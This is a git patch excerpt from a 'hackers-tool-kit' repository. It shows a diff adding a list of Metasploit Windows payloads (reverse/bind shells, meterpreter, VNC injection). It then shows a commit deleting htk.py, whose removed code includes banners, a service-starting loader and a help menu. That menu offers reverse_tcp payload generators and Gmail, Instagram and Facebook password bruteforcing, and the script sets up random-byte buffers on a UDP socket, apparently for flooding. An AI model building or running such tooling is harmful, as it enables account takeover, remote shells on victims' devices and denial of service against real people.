Bind Named Pipe Stager + 437 windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7) + 438 windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86) + 439 windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 440 windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86) + 441 windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager + 442 windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6) + 443 windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7) + 444 windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) + 445 windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager + 446 windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager + 447 windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS) + 448 windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 449 windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 450 windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support + 451 windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support + 452 windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline + 453 windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline + 454 windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline + 455 windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline + 456 windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!" + 457 windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager + 458 windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager + 459 windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86) + 460 windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86) + 461 windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager + 462 windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7) + 463 windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86) + 464 windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm) + 465 windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86) + 466 windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager + 467 windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6) + 468 windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) + 469 windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) + 470 windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager + 471 windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager + 472 windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS) + 473 windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 474 windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 475 windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support + 476 windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support + 477 windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager + 478 windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager + 479 windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86) + 480 windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86) + 481 windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager + 482 windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) + 483 windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86) + 484 windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm) + 485 windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86) + 486 windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager + 487 windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager + 488 windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet) + 489 windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy + 490 windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) + 491 windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) + 492 windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) + 493 windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager + 494 windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager + 495 windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS) + 496 windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 497 windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm) + 498 windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support + 499 windows/vncinject/reverse_udp normal No VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support + 500 windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp) + 501 windows/x64/exec normal No Windows x64 Execute Command + 502 windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path + 503 windows/x64/messagebox normal No Windows MessageBox x64 + 504 windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager + 505 windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support + 506 windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager + 507 windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager + 508 windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64) + 509 windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) + 510 windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) + 511 windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager + 512 windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager + 513 windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 514 windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64) + 515 windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp) + 516 windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp) + 517 windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64) + 518 windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64) + 519 windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64) + 520 windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64) + 521 windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64) + 522 windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64 + 523 windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP + 524 windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP + 525 windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager + 526 windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support + 527 windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager + 528 windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager + 529 windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) + 530 windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager + 531 windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 532 windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) + 533 windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline + 534 windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline + 535 windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager + 536 windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support + 537 windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager + 538 windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager + 539 windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64) + 540 windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) + 541 windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet) + 542 windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager + 543 windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm) + 544 windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64) + 545 windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp) + 546 windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp) + + From 401b75a7cdb898eb39abac9683fe428a2b2dc2b5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 02:39:55 +0100 Subject: [PATCH 139/214] Delete htk.py --- htk.py | 2805 -------------------------------------------------------- 1 file changed, 2805 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 63cb10e..0000000 --- a/htk.py +++ /dev/null @@ -1,2805 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """\033[91m -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - """.decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,9) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip 